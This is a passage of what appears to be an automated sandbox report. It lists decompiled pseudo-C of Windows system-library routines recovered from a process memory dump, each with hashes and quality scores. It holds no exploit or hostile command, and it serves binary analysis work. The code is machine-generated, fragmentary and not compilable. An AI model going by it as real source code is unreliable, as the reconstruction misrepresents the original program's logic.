*0x11a6d5c; // 0x7f360654 							_t72 =  *0x11a6d5c; // 0x7f360654 							_t75 =  *0x11a6d5c; // 0x7f360654 							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff; 						} else { 							_t116 = _t116 - 0x20; 						} 					} 					if(_t128 >= 0x61) { 						if(_t128 > 0x7a) { 							_t102 =  *0x11a6d5c; // 0x7f360654 							_t84 =  *0x11a6d5c; // 0x7f360654 							_t87 =  *0x11a6d5c; // 0x7f360654 							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff; 						} else { 							_t128 = _t128 - 0x20; 						} 					} 					if(_t116 == _t128) { 						_t61 = _v12; 						_t96 = _v8; 					} else { 						_t113 = _t116 - _t128; 						L9: 						_t111 = _a4; 						if(_t113 == 0) { 							_t115 =  &(( *_t119)[_t111 + 1]); 							_t33 =  &(_t119[1]); // 0x100 							_t120 = _a8; 							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1; 							_t35 = _t95 - 1; // 0xff 							_t124 = _t35; 							if(_t120 == 0) { 								L27: 								 *_a16 = _t95; 								_t56 = 0xc0000023; 								goto L16; 							} 							if(_t124 >= _a12) { 								if(_a12 >= 1) { 									 *_t120 = 0; 								} 								goto L27; 							} 							 *_a16 = _t124; 							_t125 = _t124 + _t124; 							E010FF3E0(_t120, _t115, _t125); 							_t56 = 0; 							 *((short*)(_t125 + _t120)) = 0; 							goto L16; 						} 						_t119 =  &(_t119[2]); 						if(_t119 < _v24) { 							L2: 							_t91 =  *_t119; 							_t61 = _t91; 							_v12 = _t61; 							_t112 =  &(_t61[_t111]); 							_v8 = _t112; 							if(_t61 >= _t112) { 								break; 							} else { 								_t127 = _v16 - _t91; 								_t96 = _t112; 								_v20 = _t127; 								_t116 =  *_t61 & 0x0000ffff; 								_t128 =  *(_t127 + _t61) & 
0x0000ffff; 								if(_t116 == _t128) { 									goto L18; 								} 								goto L5; 							} 						} else { 							_t90 = _v28; 							_t57 = _v32; 							_t123 = _v36; 							goto L12; 						} 					} 					L18: 					_t61 =  &(_t61[1]); 					_v12 = _t61; 					if(_t61 >= _t96) { 						break; 					} 					_t127 = _v20; 				} 				_t113 = 0; 				goto L9; 			}                        


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: eb2c3628e3d1c6bf60e082397451eb206b55c178387668eebcd4542bc59b12ee
                                                                            • Instruction ID: 05844506193a849930aaae6d7b3e1e86027f981f16ada95eda03e7395266651d
                                                                            • Opcode Fuzzy Hash: eb2c3628e3d1c6bf60e082397451eb206b55c178387668eebcd4542bc59b12ee
                                                                            • Instruction Fuzzy Hash: A451C576B00125CFCB18CF1EC8949BDBBF6FB88700719845AE8969B315D730AE91CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
                                                                                                                                  E010DDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) { 				char _v5; 				signed int _v12; 				signed int* _v16; 				intOrPtr _v20; 				intOrPtr _v24; 				intOrPtr _v28; 				intOrPtr _v32; 				intOrPtr _v36; 				intOrPtr _v40; 				intOrPtr _v44; 				void* __ebx; 				void* __edi; 				signed int _t54; 				char* _t58; 				signed int _t66; 				intOrPtr _t67; 				intOrPtr _t68; 				intOrPtr _t72; 				intOrPtr _t73; 				signed int* _t75; 				intOrPtr _t79; 				intOrPtr _t80; 				char _t82; 				signed int _t83; 				signed int _t84; 				signed int _t88; 				signed int _t89; 				intOrPtr _t90; 				intOrPtr _t92; 				signed int _t97; 				intOrPtr _t98; 				intOrPtr* _t99; 				signed int* _t101; 				signed int* _t102; 				intOrPtr* _t103; 				intOrPtr _t105; 				signed int _t106; 				void* _t118;  				_t92 = __edx; 				_t75 = _a4; 				_t98 = __ecx; 				_v44 = __edx; 				_t106 = _t75[1]; 				_v40 = __ecx; 				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) { 					_t82 = 0; 				} else { 					_t82 = 1; 				} 				_v5 = _t82; 				_t6 = _t98 + 0xc8; // 0xc9 				_t101 = _t6; 				 *((intOrPtr*)(_t98 + 0xd4)) = _a12; 				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8; 				 *((intOrPtr*)(_t98 + 0xd8)) = _a8; 				if(_t82 != 0) { 					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002; 					_t83 =  *_t75; 					_t54 = _t75[1]; 					 *_t101 = _t83; 					_t84 = _t83 | _t54; 					_t101[1] = _t54; 					if(_t84 == 0) { 						_t101[1] = _t101[1] & _t84; 						 *_t101 = 1; 					} 					goto L19; 				} else { 					if(_t101 == 0) { 						E010BCC50(E010B4510(0xc000000d)); 						_t88 =  *_t101; 						_t97 = _t101[1]; 						L15: 						_v12 = _t88; 						_t66 = _t88 -  *_t75; 						_t89 = _t97; 						asm("sbb ecx, [ebx+0x4]"); 						_t118 = _t89 - _t97; 						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) { 							_t66 = _t66 | 
0xffffffff; 							_t89 = 0x7fffffff; 						} 						 *_t101 = _t66; 						_t101[1] = _t89; 						L19: 						if(E010D7D50() != 0) { 							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c; 						} else { 							_t58 = 0x7ffe0386; 						} 						_t102 = _v16; 						if( *_t58 != 0) { 							_t58 = E01188ED6(_t102, _t98); 						} 						_t76 = _v44; 						E010D2280(_t58, _v44); 						E010DDD82(_v44, _t102, _t98); 						E010DB944(_t102, _v5); 						return E010CFFB0(_t76, _t98, _t76); 					} 					_t99 = 0x7ffe03b0; 					do { 						_t103 = 0x7ffe0010; 						do { 							_t67 =  *0x11a8628; // 0x0 							_v28 = _t67; 							_t68 =  *0x11a862c; // 0x0 							_v32 = _t68; 							_v24 =  *((intOrPtr*)(_t99 + 4)); 							_v20 =  *_t99; 							while(1) { 								_t97 =  *0x7ffe000c; 								_t90 =  *0x7FFE0008; 								if(_t97 ==  *_t103) { 									goto L10; 								} 								asm("pause"); 							} 							L10: 							_t79 = _v24; 							_t99 = 0x7ffe03b0; 							_v12 =  *0x7ffe03b0; 							_t72 =  *0x7FFE03B4; 							_t103 = 0x7ffe0010; 							_v36 = _t72; 						} while (_v20 != _v12 || _t79 != _t72); 						_t73 =  *0x11a8628; // 0x0 						_t105 = _v28; 						_t80 =  *0x11a862c; // 0x0 					} while (_t105 != _t73 || _v32 != _t80); 					_t98 = _v40; 					asm("sbb edx, [ebp-0x20]"); 					_t88 = _t90 - _v12 - _t105; 					_t75 = _a4; 					asm("sbb edx, eax"); 					_t31 = _t98 + 0xc8; // 0x117fb53 					_t101 = _t31; 					 *_t101 = _t88; 					_t101[1] = _t97; 					goto L15; 				} 			}                        


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4332fa389bd48b1fef49c6fd7b7ef1cb9f12eb3aad0e1e3aaccc158de3cf4088
                                                                            • Instruction ID: 1105d58b39beacabcd90ee855caeb68ea6871d33374e6fdc3da956f86d77783f
                                                                            • Opcode Fuzzy Hash: 4332fa389bd48b1fef49c6fd7b7ef1cb9f12eb3aad0e1e3aaccc158de3cf4088
                                                                            • Instruction Fuzzy Hash: 5D518C71A0071ADFCB14DFA8C480AAEBBF5BB49310F24816AD599A7385DB31A944CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 96%
                                                                                                                                  E010CEF40(intOrPtr __ecx) { 				char _v5; 				char _v6; 				char _v7; 				char _v8; 				signed int _v12; 				intOrPtr _v16; 				intOrPtr _v20; 				void* __ebx; 				void* __edi; 				void* __esi; 				void* __ebp; 				intOrPtr _t58; 				char _t59; 				signed char _t69; 				void* _t73; 				signed int _t74; 				char _t79; 				signed char _t81; 				signed int _t85; 				signed int _t87; 				intOrPtr _t90; 				signed char* _t91; 				void* _t92; 				signed int _t94; 				void* _t96;  				_t90 = __ecx; 				_v16 = __ecx; 				if(( *(__ecx + 0x14) & 0x04000000) != 0) { 					_t58 =  *((intOrPtr*)(__ecx)); 					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) { 						E010B9080(_t73, __ecx, __ecx, _t92); 					} 				} 				_t74 = 0; 				_t96 =  *0x7ffe036a - 1; 				_v12 = 0; 				_v7 = 0; 				if(_t96 > 0) { 					_t74 =  *(_t90 + 0x14) & 0x00ffffff; 					_v12 = _t74; 					_v7 = _t96 != 0; 				} 				_t79 = 0; 				_v8 = 0; 				_v5 = 0; 				while(1) { 					L4: 					_t59 = 1; 					L5: 					while(1) { 						if(_t59 == 0) { 							L12: 							_t21 = _t90 + 4; // 0x775ec21e 							_t87 =  *_t21; 							_v6 = 0; 							if(_t79 != 0) { 								if((_t87 & 0x00000002) != 0) { 									goto L19; 								} 								if((_t87 & 0x00000001) != 0) { 									_v6 = 1; 									_t74 = _t87 ^ 0x00000003; 								} else { 									_t51 = _t87 - 2; // -2 									_t74 = _t51; 								} 								goto L15; 							} else { 								if((_t87 & 0x00000001) != 0) { 									_v6 = 1; 									_t74 = _t87 ^ 0x00000001; 								} else { 									_t26 = _t87 - 4; // -4 									_t74 = _t26; 									if((_t74 & 0x00000002) == 0) { 										_t74 = _t74 - 2; 									} 								} 								L15: 								if(_t74 == _t87) { 									L19: 									E010B2D8A(_t74, _t90, _t87, _t90); 									_t74 = _v12; 									_v8 = 1; 									if(_v7 != 0 && _t74 > 0x64) { 										_t74 = _t74 - 1; 								
		_v12 = _t74; 									} 									_t79 = _v5; 									goto L4; 								} 								asm("lock cmpxchg [esi], ecx"); 								if(_t87 != _t87) { 									_t74 = _v12; 									_t59 = 0; 									_t79 = _v5; 									continue; 								} 								if(_v6 != 0) { 									_t74 = _v12; 									L25: 									if(_v7 != 0) { 										if(_t74 < 0x7d0) { 											if(_v8 == 0) { 												_t74 = _t74 + 1; 											} 										} 										_t38 = _t90 + 0x14; // 0x0 										_t39 = _t90 + 0x14; // 0x0 										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39; 										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) { 											_t85 = _t85 & 0xff000000; 										} 										 *(_t90 + 0x14) = _t85; 									} 									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24)); 									 *((intOrPtr*)(_t90 + 8)) = 1; 									return 0; 								} 								_v5 = 1; 								_t87 = _t74; 								goto L19; 							} 						} 						_t94 = _t74; 						_v20 = 1 + (0 | _t79 != 0x00000000) * 2; 						if(_t74 == 0) { 							goto L12; 						} else { 							_t91 = _t90 + 4; 							goto L8; 							L9: 							while((_t81 & 0x00000001) != 0) { 								_t69 = _t81; 								asm("lock cmpxchg [edi], edx"); 								if(_t69 != _t81) { 									_t81 = _t69; 									continue; 								} 								_t90 = _v16; 								goto L25; 							} 							asm("pause"); 							_t94 = _t94 - 1; 							if(_t94 != 0) { 								L8: 								_t81 =  *_t91; 								goto L9; 							} else { 								_t90 = _v16; 								_t79 = _v5; 								goto L12; 							} 						} 					} 				} 			}                        


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 84%
E0118740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
    signed short* _v8;
    intOrPtr _v12;
    intOrPtr _t55;
    void* _t56;
    intOrPtr* _t66;
    intOrPtr* _t69;
    void* _t74;
    intOrPtr* _t78;
    intOrPtr* _t81;
    intOrPtr* _t82;
    intOrPtr _t83;
    signed short* _t84;
    intOrPtr _t85;
    signed int _t87;
    intOrPtr* _t90;
    intOrPtr* _t93;
    intOrPtr* _t94;
    void* _t98;

    _t84 = __edx;
    _t80 = __ecx;
    _push(__ecx);
    _push(__ecx);
    _t55 = __ecx;
    _v8 = __edx;
    _t87 =  *__edx & 0x0000ffff;
    _v12 = __ecx;
    _t3 = _t55 + 0x154; // 0x154
    _t93 = _t3;
    _t78 =  *_t93;
    _t4 = _t87 + 2; // 0x2
    _t56 = _t4;
    while(_t78 != _t93) {
        if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
            L4:
            _t78 =  *_t78;
            continue;
        } else {
            _t7 = _t78 + 0x18; // 0x18
            if(E0110D4F0(_t7, _t84[2], _t87) == _t87) {
                _t40 = _t78 + 0xc; // 0xc
                _t94 = _t40;
                _t90 =  *_t94;
                while(_t90 != _t94) {
                    _t41 = _t90 + 8; // 0x8
                    _t74 = E010FF380(_a4, _t41, 0x10);
                    _t98 = _t98 + 0xc;
                    if(_t74 != 0) {
                        _t90 =  *_t90;
                        continue;
                    }
                    goto L12;
                }
                _t82 = L010D4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                if(_t82 != 0) {
                    _t46 = _t78 + 0xc; // 0xc
                    _t69 = _t46;
                    asm("movsd");
                    asm("movsd");
                    asm("movsd");
                    asm("movsd");
                    _t85 =  *_t69;
                    if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                        L20:
                        _t82 = 3;
                        asm("int 0x29");
                    }
                    *((intOrPtr*)(_t82 + 4)) = _t69;
                    *_t82 = _t85;
                    *((intOrPtr*)(_t85 + 4)) = _t82;
                    *_t69 = _t82;
                    *(_t78 + 8) =  *(_t78 + 8) + 1;
                    *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                    goto L11;
                } else {
                    L18:
                    _push(0xe);
                    _pop(0);
                }
            } else {
                _t84 = _v8;
                _t9 = _t87 + 2; // 0x2
                _t56 = _t9;
                goto L4;
            }
        }
        L12:
        return 0;
    }
    _t10 = _t87 + 0x1a; // 0x1a
    _t78 = L010D4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
    if(_t78 == 0) {
        goto L18;
    } else {
        _t12 = _t87 + 2; // 0x2
        *((intOrPtr*)(_t78 + 0x14)) = _t12;
        _t16 = _t78 + 0x18; // 0x18
        E010FF3E0(_t16, _v8[2], _t87);
        *((short*)(_t78 + _t87 + 0x18)) = 0;
        _t19 = _t78 + 0xc; // 0xc
        _t66 = _t19;
        *((intOrPtr*)(_t66 + 4)) = _t66;
        *_t66 = _t66;
        *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
        _t81 = L010D4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
        if(_t81 == 0) {
            goto L18;
        } else {
            _t26 = _t78 + 0xc; // 0xc
            _t69 = _t26;
            asm("movsd");
            asm("movsd");
            asm("movsd");
            asm("movsd");
            _t85 =  *_t69;
            if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                goto L20;
            } else {
                *((intOrPtr*)(_t81 + 4)) = _t69;
                *_t81 = _t85;
                *((intOrPtr*)(_t85 + 4)) = _t81;
                *_t69 = _t81;
                _t83 = _v12;
                *(_t78 + 8) = 1;
                *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                _t34 = _t83 + 0x154; // 0x1ba
                _t69 = _t34;
                _t85 =  *_t69;
                if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                    goto L20;
                } else {
                    *_t78 = _t85;
                    *((intOrPtr*)(_t78 + 4)) = _t69;
                    *((intOrPtr*)(_t85 + 4)) = _t78;
                    *_t69 = _t78;
                    *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                }
            }
            goto L11;
        }
    }
    goto L12;
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 97%
E010E2990() {
    signed int* _t62;
    signed int _t64;
    intOrPtr _t66;
    signed short* _t69;
    intOrPtr _t76;
    signed short* _t79;
    void* _t81;
    signed int _t82;
    signed short* _t83;
    signed int _t87;
    intOrPtr _t91;
    void* _t98;
    signed int _t99;
    void* _t101;
    signed int* _t102;
    void* _t103;
    void* _t104;
    void* _t107;

    _push(0x20);
    _push(0x118ff00);
    E0110D08C(_t81, _t98, _t101);
    *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
    _t99 = 0;
    *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
    _t82 =  *((intOrPtr*)(_t103 + 0x10));
    if(_t82 == 0) {
        _t62 = 0xc0000100;
    } else {
        *((intOrPtr*)(_t103 - 4)) = 0;
        _t102 = 0xc0000100;
        *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
        _t64 = 4;
        while(1) {
            *(_t103 - 0x24) = _t64;
            if(_t64 == 0) {
                break;
            }
            _t87 = _t64 * 0xc;
            *(_t103 - 0x2c) = _t87;
            _t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1091664));
            if(_t107 <= 0) {
                if(_t107 == 0) {
                    _t79 = E010FE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1091668)), _t82);
                    _t104 = _t104 + 0xc;
                    __eflags = _t79;
                    if(__eflags == 0) {
                        _t102 = E011351BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x109166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                        *((intOrPtr*)(_t103 - 0x30)) = _t102;
                        break;
                    } else {
                        _t64 =  *(_t103 - 0x24);
                        goto L5;
                    }
                    goto L13;
                } else {
                    L5:
                    _t64 = _t64 - 1;
                    continue;
                }
            }
            break;
        }
        *((intOrPtr*)(_t103 - 0x1c)) = _t102;
        __eflags = _t102;
        if(_t102 < 0) {
            __eflags = _t102 - 0xc0000100;
            if(_t102 == 0xc0000100) {
                _t83 =  *((intOrPtr*)(_t103 + 8));
                __eflags = _t83;
                if(_t83 != 0) {
                    *((intOrPtr*)(_t103 - 0x20)) = _t83;
                    __eflags =  *_t83 - _t99;
                    if( *_t83 == _t99) {
                        _t102 = 0xc0000100;
                        goto L19;
                    } else {
                        _t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                        _t66 =  *((intOrPtr*)(_t91 + 0x10));
                        __eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                        if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                            __eflags =  *((intOrPtr*)(_t91 + 0x1c));
                            if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                                L26:
                                _t102 = E010E2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                __eflags = _t102 - 0xc0000100;
                                if(_t102 != 0xc0000100) {
                                    goto L12;
                                } else {
                                    _t99 = 1;
                                    _t83 =  *((intOrPtr*)(_t103 - 0x20));
                                    goto L18;
                                }
                            } else {
                                _t69 = E010C6600( *((intOrPtr*)(_t91 + 0x1c)));
                                __eflags = _t69;
                                if(_t69 != 0) {
                                    goto L26;
                                } else {
                                    _t83 =  *((intOrPtr*)(_t103 + 8));
                                    goto L18;
                                }
                            }
                        } else {
                            L18:
                            _t102 = E010E2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                            L19:
                            *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                            goto L12;
                        }
                    }
                    L28:
                } else {
                    E010CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                    *((intOrPtr*)(_t103 - 4)) = 1;
                    *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                    _t102 =  *((intOrPtr*)(_t103 + 0x1c));
                    _t76 = E010E2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                    *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                    __eflags = _t76 - 0xc0000100;
                    if(_t76 == 0xc0000100) {
                        *((intOrPtr*)(_t103 - 0x1c)) = E010E2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                    }
                    *((intOrPtr*)(_t103 - 4)) = _t99;
                    E010E2ACB();
                }
            }
        }
        L12:
        *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
        _t62 = _t102;
    }
    L13:
    return E0110D0D1(_t62);
    goto L28;
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f34631dbbc6e296ab20a2fb28b92dc9b118afe0808b3aa0e15024694215602bb
                                                                            • Instruction ID: 71765e537d7e8e5d8238f542309d739a7fad22ef174d3caea94e03d13f1771ff
                                                                            • Opcode Fuzzy Hash: f34631dbbc6e296ab20a2fb28b92dc9b118afe0808b3aa0e15024694215602bb
                                                                            • Instruction Fuzzy Hash: 6D519E3190021ADFDF25DF9AC884ADEBBF9BF48350F098159E944AB250D7319D52CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 78%
                                                                                                                                  E010E4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) { 				signed int _v12; 				char _v176; 				char _v177; 				char _v184; 				intOrPtr _v192; 				intOrPtr _v196; 				void* __ebx; 				void* __edi; 				void* __esi; 				signed short _t42; 				char* _t44; 				intOrPtr _t46; 				intOrPtr _t50; 				char* _t57; 				intOrPtr _t59; 				intOrPtr _t67; 				signed int _t69;  				_t64 = __edx; 				_v12 =  *0x11ad360 ^ _t69; 				_t65 = 0xa0; 				_v196 = __edx; 				_v177 = 0; 				_t67 = __ecx; 				_v192 = __ecx; 				E010FFA60( &_v176, 0, 0xa0); 				_t57 =  &_v176; 				_t59 = 0xa0; 				if( *0x11a7bc8 != 0) { 					L3: 					while(1) { 						asm("movsd"); 						asm("movsd"); 						asm("movsd"); 						asm("movsd"); 						_t67 = _v192; 						 *((intOrPtr*)(_t57 + 0x10)) = _a4; 						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000; 						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff; 						 *((intOrPtr*)(_t57 + 0x20)) = _v196; 						_push( &_v184); 						_push(_t59); 						_push(_t57); 						_push(0xa0); 						_push(_t57); 						_push(0xf); 						_t42 = E010FB0B0(); 						if(_t42 != 0xc0000023) { 							break; 						} 						if(_v177 != 0) { 							L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57); 						} 						_v177 = 1; 						_t44 = L010D4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184); 						_t59 = _v184; 						_t57 = _t44; 						if(_t57 != 0) { 							continue; 						} else { 							_t42 = 0xc0000017; 							break; 						} 					} 					if(_t42 != 0) { 						_t65 = E010BCCC0(_t42); 						if(_t65 != 0) { 							L10: 							if(_v177 != 0) { 								if(_t57 != 0) { 									L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57); 								} 							} 							_t46 = _t65; 							L12: 							return E010FB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67); 						} 						L7: 						_t50 = _a4; 						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 
0x18)); 						if(_t50 != 3) { 							if(_t50 == 2) { 								goto L8; 							} 							L9: 							if(E010FF380(_t67 + 0xc, 0x1095138, 0x10) == 0) { 								 *0x11a60d8 = _t67; 							} 							goto L10; 						} 						L8: 						_t64 = _t57 + 0x28; 						E010E4F49(_t67, _t57 + 0x28); 						goto L9; 					} 					_t65 = 0; 					goto L7; 				} 				if(E010E4E70(0x11a86b0, 0x10e5690, 0, 0) != 0) { 					_t46 = E010BCCC0(_t56); 					goto L12; 				} else { 					_t59 = 0xa0; 					goto L3; 				} 			}                        


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 20cd7d1e7d62c0cf057e1fe0dfba800835262d9c66ecc085f5912b20738df2a6
                                                                            • Instruction ID: fa9496a5689beb1e23bce0c180418118adee327b11ef649d547bec3b048f9240
                                                                            • Opcode Fuzzy Hash: 20cd7d1e7d62c0cf057e1fe0dfba800835262d9c66ecc085f5912b20738df2a6
                                                                            • Instruction Fuzzy Hash: 5841E171A443189FEB36DF19CC84BAAB7E9EB54710F0000AAE985DB381D770DD84CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 85%
                                                                                                                                  E010E4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) { 				signed int _v8; 				short _v20; 				intOrPtr _v24; 				intOrPtr _v28; 				intOrPtr _v32; 				char _v36; 				char _v156; 				short _v158; 				intOrPtr _v160; 				char _v164; 				intOrPtr _v168; 				void* __ebx; 				void* __edi; 				void* __esi; 				signed int _t45; 				intOrPtr _t74; 				signed char _t77; 				intOrPtr _t84; 				char* _t85; 				void* _t86; 				intOrPtr _t87; 				signed short _t88; 				signed int _t89;  				_t83 = __edx; 				_v8 =  *0x11ad360 ^ _t89; 				_t45 = _a8 & 0x0000ffff; 				_v158 = __edx; 				_v168 = __ecx; 				if(_t45 == 0) { 					L22: 					_t86 = 6; 					L12: 					E010BCC50(_t86); 					L11: 					return E010FB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86); 				} 				_t77 = _a4; 				if((_t77 & 0x00000001) != 0) { 					goto L22; 				} 				_t8 = _t77 + 0x34; // 0xdce0ba00 				if(_t45 !=  *_t8) { 					goto L22; 				} 				_t9 = _t77 + 0x24; // 0x11a8504 				E010D2280(_t9, _t9); 				_t87 = 0x78; 				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24); 				E010FFA60( &_v156, 0, _t87); 				_t13 = _t77 + 0x30; // 0x3db8 				_t85 =  &_v156; 				_v36 =  *_t13; 				_v28 = _v168; 				_v32 = 0; 				_v24 = 0; 				_v20 = _v158; 				_v160 = 0; 				while(1) { 					_push( &_v164); 					_push(_t87); 					_push(_t85); 					_push(0x18); 					_push( &_v36); 					_push(0x1e); 					_t88 = E010FB0B0(); 					if(_t88 != 0xc0000023) { 						break; 					} 					if(_t85 !=  &_v156) { 						L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85); 					} 					_t84 = L010D4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164); 					_v168 = _v164; 					if(_t84 == 0) { 						_t88 = 0xc0000017; 						goto L19; 					} else { 						_t74 = _v160 + 1; 						_v160 = _t74; 						if(_t74 >= 0x10) { 							L19: 							_t86 = E010BCCC0(_t88); 							if(_t86 != 0) { 								L8: 								 *(_t77 
